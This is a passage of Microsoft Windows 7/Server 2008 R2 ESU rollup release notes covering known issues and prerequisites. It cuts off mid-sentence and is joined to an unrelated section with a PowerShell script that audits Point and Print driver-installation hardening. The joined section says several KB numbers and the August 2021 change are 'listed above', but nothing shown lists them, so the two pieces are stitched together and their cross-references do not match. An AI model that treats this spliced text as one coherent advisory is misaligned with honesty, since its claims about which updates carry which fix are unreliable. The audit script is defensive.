For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.

## **Known issues in this update**

**Symptom:** After installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).

**Workaround:** This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>). **Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support.

**Symptom:** After installing this update and restarting your device, you might receive the error, "Failure to configure Windows updates. Reverting Changes. Do not turn off your computer," and the update might show as **Failed** in **Update History**.

**Workaround:** This is expected in the following circumstances:

 * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).
 * If you do not have an ESU MAK add-on key installed and activated.

If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article.

**Symptom:** Certain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, "STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)". This occurs when you perform the operation on a CSV owner node from a process that doesn't have administrator privilege.

**Workaround:** Do one of the following:

 * Perform the operation from a process that has administrator privilege.
 * Perform the operation from a node that doesn't have CSV ownership.

Microsoft is working on a resolution and will provide an update in an upcoming release.

## **How to get this update**

**Before installing this update**

**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:

 * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.
 * For Windows Embedded Standard 7, extended support ends on October 13, 2020.

For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).

**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.

**Prerequisite:** You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.

 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.
 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).
 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.
 4. To get this security update, you must reinstall the "Extended Security Updates (ESU) Licensing Preparation Package" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or t
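Every KB entry above lists the same change: after the August 10, 2021 update you must be an administrator to install drivers through Point and Print, which is the as-designed staging path that Concealed Position relies on. The change is enforced by a registry value that KB5005652 documents and that an administrator can set back to 0, so an audit needs to answer two questions: is the host at that servicing level, and has the override been used. The PowerShell below is an added example, not part of the KB articles and not Microsoft's tooling. The key path and value name `RestrictDriverInstallationToAdministrators` are taken from KB5005652, which the articles cite but this page does not quote; the build numbers (19041/19042/19043 at UBR 1165) are the OS builds KB5005033 names, and the rollup KB numbers are the ones listed above. Requires PowerShell 3.0 or later; run elevated for a complete view.

```powershell
# Added example, not part of the KB articles on this page and not Microsoft tooling.
# Reports whether a host carries the August 10, 2021 Point and Print change and whether
# the override documented in KB5005652 (cited by the articles, not quoted on this page)
# has been used to switch it off.

$PointAndPrintKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$RestrictValueName = 'RestrictDriverInstallationToAdministrators'   # value name from KB5005652

# Windows 10 builds named in KB5005033 and the UBR at which that LCU (or a later one) is present.
$Win10MinimumUbr = @{ '19041' = 1165; '19042' = 1165; '19043' = 1165 }

# August 10, 2021 packages listed on this page for the older platforms. Get-HotFix proves
# presence only; a later rollup may have superseded these, so absence is a hint, not a verdict.
$RollupKbs = @('KB5005088', 'KB5005090')

function Get-PointAndPrintPosture {
    [CmdletBinding()]
    param()

    $cv    = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [string]$cv.CurrentBuild
    $ubr   = [int]$cv.UBR

    # Servicing level: build+UBR for the Windows 10 builds on this page, KB lookup elsewhere.
    $viaHotFix = $false
    if ($Win10MinimumUbr.ContainsKey($build)) {
        $patched  = $ubr -ge $Win10MinimumUbr[$build]
        $evidence = "build $build.$ubr (need $build.$($Win10MinimumUbr[$build]) or later)"
    } else {
        $viaHotFix = $true
        $found = Get-HotFix -ErrorAction SilentlyContinue |
                 Where-Object { $RollupKbs -contains $_.HotFixID } |
                 Select-Object -ExpandProperty HotFixID
        $patched  = [bool]$found
        $evidence = if ($found) { "installed: $($found -join ', ')" }
                    else { 'none of the listed rollups reported by Get-HotFix (may be superseded)' }
    }

    # The override. Absent means the default applies, which after the August 2021 update
    # is 1 (administrators only). An explicit 0 reopens non-admin driver installation.
    $override = $null
    if (Test-Path -Path $PointAndPrintKey) {
        $override = (Get-ItemProperty -Path $PointAndPrintKey -Name $RestrictValueName `
                        -ErrorAction SilentlyContinue).$RestrictValueName
    }

    $verdict = if (-not $patched -and $viaHotFix) {
        'Listed rollups not found; confirm the servicing level before assuming the pre-update default'
    } elseif (-not $patched) {
        'Below the August 10, 2021 servicing level: non-admin Point and Print driver installs are the default'
    } elseif ($override -eq 0) {
        "$RestrictValueName is explicitly 0: the hardening is switched off on this host"
    } else {
        'Hardened: only administrators can install Point and Print drivers'
    }

    [pscustomobject]@{
        ComputerName        = $env:COMPUTERNAME
        ServicingEvidence   = $evidence
        AugustUpdatePresent = $patched
        RestrictOverride    = $override      # $null = value absent, so the default applies
        Verdict             = $verdict
    }
}

# Usage: run locally, or for a fleet save this file and run it remotely, e.g.
# Invoke-Command -ComputerName 'ws01','ws02' -FilePath .\Get-PointAndPrintPosture.ps1
# (placeholder host and file names).
Get-PointAndPrintPosture | Format-List
```

The build/UBR comparison is preferred over `Get-HotFix` on Windows 10 because each cumulative update replaces the previous one, so KB5005033 stops appearing once a later LCU is installed even though its change is still present; only the explicit 0 in the override value, not an unpatched build, is something an administrator chose, so treat the two verdicts differently when triaging.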